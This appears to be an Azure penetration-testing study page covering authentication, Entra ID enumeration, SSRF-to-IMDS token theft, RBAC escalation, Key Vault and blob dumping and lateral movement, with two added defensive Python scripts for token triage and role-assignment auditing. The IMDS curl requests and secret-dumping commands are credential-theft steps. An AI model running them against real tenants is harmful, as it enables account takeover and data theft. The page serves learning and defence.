# Azure

### 1. Azure Cloud Overview

#### Core Components

* **Azure Active Directory (AAD / Entra ID)** – Identity & Access Management (users, groups, roles, service principals, managed identities).
* **Azure Resource Manager (ARM)** – Control plane for deploying, managing, securing resources.
* **Office 365 / M365** – Productivity suite, integrated with AAD.

#### Cloud Spaces

* **Control Plane**: ARM API, Azure Portal, PowerShell, CLI.
* **Data Plane**: Actual resources (VMs, Blob Storage, Functions, etc.).
* **Identity Plane**: AAD identities, tokens, RBAC.

***

### 2. Authentication in Azure

#### Methods

1. **Username & Password** (long-term)

   ```powershell
   az login
   Connect-AzAccount
   Connect-MgGraph -Scopes "Directory.Read.All"
   ```
2. **Service Principal (App ID + Secret/Cert)**

   ```powershell
   az login --service-principal -u <AppID> -p <Password> --tenant <TenantID>
   $cred = Get-Credential   # AppID + Secret
   Connect-AzAccount -ServicePrincipal -Tenant <TenantID> -Credential $cred
   ```
3. **Access Token (short-term)**

   ```powershell
   az account get-access-token --resource=https://management.azure.com
   # -AccountId (UPN, or the app/client ID for an app token) is required alongside -AccessToken
   Connect-AzAccount -AccessToken <AAD_AccessToken> -AccountId <UPN_or_AppId>
   ```
4. **Instance Metadata Service (IMDS)** – Auto-issued tokens inside VMs

   ```bash
   curl -H "Metadata:true" \
   "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
   ```

**Concept: IMDS**

* `169.254.169.254` = internal IP for Azure metadata.
* Exposes **OAuth2 tokens** for Managed Identity.
* Exploitable via **SSRF** or **local compromise**.
* IMDSv1: No session binding → SSRF-prone.
* IMDSv2 (work in progress for Azure, stronger binding).
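When a token from IMDS (or any Entra ID access token) turns up in a log, a ticket or a suspected leak, the first triage step is to read its claims locally: which tenant it belongs to, which resource it is scoped to (`aud`), which identity it represents, and whether it is still live. The script below is an added example, not code from the original page; it decodes the JWT payload without verifying the signature (triage only, never an authorisation decision), builds its own constructed sample token, and assumes that managed-identity tokens carry the identity's resource ID in the `xms_mirid` claim, falling back to `appid`/`oid` where that claim is absent.

```python
import base64
import json
import time

# Well-known token audiences (resource identifiers) and what a token for them reaches.
AUDIENCES = {
    "https://management.azure.com": "ARM control plane (resources, RBAC)",
    "https://graph.microsoft.com": "Microsoft Graph (users, groups, applications)",
    "https://vault.azure.net": "Key Vault data plane (secrets, keys)",
    "https://storage.azure.com": "Storage data plane (blobs, queues)",
}


def _b64url_decode(segment: str) -> bytes:
    # JWT segments are base64url without padding; restore it before decoding.
    segment += "=" * (-len(segment) % 4)
    return base64.urlsafe_b64decode(segment)


def decode_claims(token: str) -> dict:
    """Return the payload claims of a compact JWT.

    The signature is NOT verified here: this is for incident triage only.
    """
    parts = token.strip().split(".")
    if len(parts) != 3:
        raise ValueError("expected a compact JWT with three dot-separated parts")
    return json.loads(_b64url_decode(parts[1]))


def triage_token(token: str, now=None) -> dict:
    """Summarise tenant, audience, identity and remaining lifetime of a token."""
    now = time.time() if now is None else now
    c = decode_claims(token)
    aud = str(c.get("aud", "")).rstrip("/")      # 'aud' may or may not carry a trailing slash
    exp = int(c.get("exp", 0))
    return {
        "tenant": c.get("tid"),
        "audience": aud,
        "grants": AUDIENCES.get(aud, "unknown / non-Azure audience"),
        # Assumption: managed-identity tokens carry the identity's ARM resource ID
        # in 'xms_mirid'; otherwise fall back to the app ID or object ID.
        "identity": c.get("xms_mirid") or c.get("appid") or c.get("oid"),
        "expired": exp <= now,
        "seconds_left": max(0, exp - int(now)),
    }


def make_sample_token(claims: dict) -> str:
    """Constructed sample token with a fake signature (no key material involved)."""
    enc = lambda d: base64.urlsafe_b64encode(json.dumps(d).encode()).rstrip(b"=").decode()
    return f"{enc({'alg': 'RS256', 'typ': 'JWT'})}.{enc(claims)}.constructed-signature"


if __name__ == "__main__":
    # Constructed sample: an ARM-scoped managed-identity token valid for one hour.
    sample = make_sample_token({
        "aud": "https://management.azure.com/",
        "tid": "00000000-0000-0000-0000-000000000000",
        "exp": int(time.time()) + 3600,
        "xms_mirid": "/subscriptions/<sub>/resourceGroups/<rg>/providers/Microsoft.Compute/virtualMachines/<vm>",
    })
    print(json.dumps(triage_token(sample), indent=2))
```

The `grants` line is the one that decides urgency: an ARM or Graph audience with time left means the identity behind it should be reviewed and, for a managed identity, the VM it belongs to treated as compromised until the SSRF or host access is closed.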

***

### 3. Enumeration Phase

#### AAD Discovery

* Check if target org uses Entra ID:

  ```bash
  curl "https://login.microsoftonline.com/getuserrealm.srf?login=<user>@<domain>&xml=1"
  ```
* List current session:

  ```powershell
  Get-MgContext
  ```
* Enumerate roles:

  ```powershell
  Get-MgDirectoryRole | ConvertTo-Json
  Get-MgDirectoryRoleMember -DirectoryRoleId <RoleID> -All | ConvertTo-Json
  ```
* Enumerate users & groups:

  ```powershell
  Get-MgUser
  Get-MgUserMemberOf -UserId <UserID>
  Get-MgGroup
  Get-MgGroupMember -GroupId <GroupID> | ConvertTo-Json
  ```
* Applications / Service Principals:

  ```powershell
  Get-MgApplication
  Get-MgApplication -ApplicationId <AppObjectID> | ConvertTo-Json
  Get-MgApplicationOwner -ApplicationId <AppObjectID> | ConvertTo-Json
  ```

***

### 4. Exploitation Scenarios

#### 4.1 SSRF → IMDS Token Theft

1. Find SSRF in a web app on Azure VM.
2. Target IMDS endpoint:

   ```bash
   curl -H "Metadata:true" \
   "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://graph.microsoft.com/"
   ```

   → Returns access token for **Microsoft Graph API**.
3. Configure with stolen creds:

   ```powershell
   az account get-access-token --resource https://graph.microsoft.com
   # -AccountId (the managed identity's client/app ID) is required alongside -AccessToken
   Connect-AzAccount -AccessToken <Token> -AccountId <ClientId>
   ```
4. Enumerate tenant, users, groups with Graph API.

***

#### 4.2 ARM Token Abuse

* Request ARM-scoped token from IMDS:

  ```bash
  curl -H "Metadata:true" \
  "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
  ```
* Enumerate resources:

  ```bash
  az vm list --output table
  az storage account list --output table
  ```

***

#### 4.3 Privilege Escalation via RBAC

* List roles:

  ```bash
  az role assignment list --all
  ```
* If the attacker holds **Owner** (or a role that can write role assignments) → they can create new role definitions or assign themselves higher privileges.
* Example: assign `User Access Administrator` to a controlled principal → it can then grant any role at that scope, i.e. full takeover.

***

#### 4.4 Service Principal Abuse

* If SP creds are leaked (from GitHub, etc.):

  ```bash
  az login --service-principal -u <AppID> -p <Password> --tenant <TenantID>
  ```
* Check assigned roles → escalate or pivot.

***

### 5. Post-Exploitation

* Dump data from Blob Storage:

  ```bash
  az storage blob list --account-name <storage> --container-name <container>
  az storage blob download --account-name <storage> --container-name <container> --name <blob> --file dump.txt
  ```
* Enumerate Key Vault secrets:

  ```bash
  az keyvault secret list --vault-name <vault>
  az keyvault secret show --vault-name <vault> --name <secret>
  ```

***

### 6. Lateral Movement

* Use stolen tokens to **pivot tenants/subscriptions**.
* Exploit **custom role definitions** to gain indirect access.
* Example scenario from CTF (generalized):
  * Attacker compromises VM → retrieves IMDS token.
  * Token has **Reader** role at subscription level.
  * However, token also has custom role at VM resource scope → allows reading group info.
  * From there, attacker enumerates applications and pivots via Graph API.

***

### 7. Detection & Defense

* **Enable Azure AD logs & alerts**: Monitor anomalous logins, token use.
* **Restrict IMDS exposure**: Disable public endpoints, enforce network rules.
* **Use Conditional Access**: Restrict Graph API access by location/device.
* **RBAC Hardening**: Audit custom roles, remove broad assignments.
* **Key Vault**: Enable firewall & access policies.
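The RBAC hardening step above and the escalation path in 4.3 are two sides of the same audit: the assignments an attacker looks for are the ones a defender should find first. The script below is an added example, not the page's own tooling; it reads records in the shape `az role assignment list --all -o json` emits (`roleDefinitionName`, `principalName`, `principalType`, `scope`), classifies each scope, and flags access-granting roles at broad scope and on service principals (the leaked-secret case in 4.4). The sample assignments are constructed. Contributor is rated lower because, unlike Owner and User Access Administrator, it cannot write role assignments.

```python
import json

# Roles that can change who has access: the "assign higher privileges" path in 4.3.
ACCESS_GRANTING_ROLES = {"Owner", "User Access Administrator"}
# Broad write access to resources, but no Microsoft.Authorization write permission.
BROAD_WRITE_ROLES = {"Contributor"}
BROAD_SCOPES = {"root", "managementGroup", "subscription"}


def scope_level(scope: str) -> str:
    """Classify an ARM scope string: root / managementGroup / subscription / resourceGroup / resource."""
    s = scope.strip().rstrip("/").lower()
    if s == "":
        return "root"
    if "/providers/microsoft.management/managementgroups/" in s:
        return "managementGroup"
    parts = [p for p in s.split("/") if p]
    if not parts or parts[0] != "subscriptions":
        return "other"
    if len(parts) == 2:
        return "subscription"
    if len(parts) == 4 and parts[2] == "resourcegroups":
        return "resourceGroup"
    return "resource"


def audit_assignments(assignments) -> list:
    """Return findings for assignments that give takeover or broad-write capability."""
    findings = []
    for a in assignments:
        role = a.get("roleDefinitionName", "")
        level = scope_level(a.get("scope", ""))
        ptype = a.get("principalType", "")
        who = a.get("principalName") or a.get("principalId", "<unknown>")
        if role in ACCESS_GRANTING_ROLES and level in BROAD_SCOPES:
            findings.append({"severity": "high", "principal": who, "role": role, "scope": a.get("scope"),
                             "reason": f"{role} at {level} scope can grant any role beneath it"})
        elif role in ACCESS_GRANTING_ROLES and ptype == "ServicePrincipal":
            findings.append({"severity": "high", "principal": who, "role": role, "scope": a.get("scope"),
                             "reason": "service principal can manage access; a leaked secret becomes takeover"})
        elif role in BROAD_WRITE_ROLES and level in BROAD_SCOPES:
            findings.append({"severity": "medium", "principal": who, "role": role, "scope": a.get("scope"),
                             "reason": f"{role} at {level} scope can modify every resource (not RBAC)"})
    return findings


def audit_az_json(text: str) -> list:
    """Convenience wrapper for the raw output of `az role assignment list --all -o json`."""
    return audit_assignments(json.loads(text))


# Constructed sample in the az CLI output shape (subscription ID is a placeholder).
SAMPLE_ASSIGNMENTS = [
    {"roleDefinitionName": "Owner", "principalName": "alice@example.com", "principalType": "User",
     "scope": "/subscriptions/<sub>"},
    {"roleDefinitionName": "User Access Administrator", "principalName": "ci-deploy",
     "principalType": "ServicePrincipal", "scope": "/subscriptions/<sub>/resourceGroups/rg-app"},
    {"roleDefinitionName": "Reader", "principalName": "monitor-sp", "principalType": "ServicePrincipal",
     "scope": "/subscriptions/<sub>"},
    {"roleDefinitionName": "Contributor", "principalName": "devs", "principalType": "Group",
     "scope": "/subscriptions/<sub>"},
    {"roleDefinitionName": "Owner", "principalName": "bob@example.com", "principalType": "User",
     "scope": "/subscriptions/<sub>/resourceGroups/rg-app/providers/Microsoft.Compute/virtualMachines/vm1"},
]

if __name__ == "__main__":
    for f in audit_assignments(SAMPLE_ASSIGNMENTS):
        print(f"[{f['severity']}] {f['principal']:<20} {f['role']:<28} {f['scope']}  ({f['reason']})")
```

Run it against a real export and treat every `high` finding as a question to the owner of that principal; Owner on a single VM (the last sample row) is not flagged because it cannot reach beyond that resource, whereas the service principal with User Access Administrator on a resource group is exactly the pivot point the lateral movement section describes.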


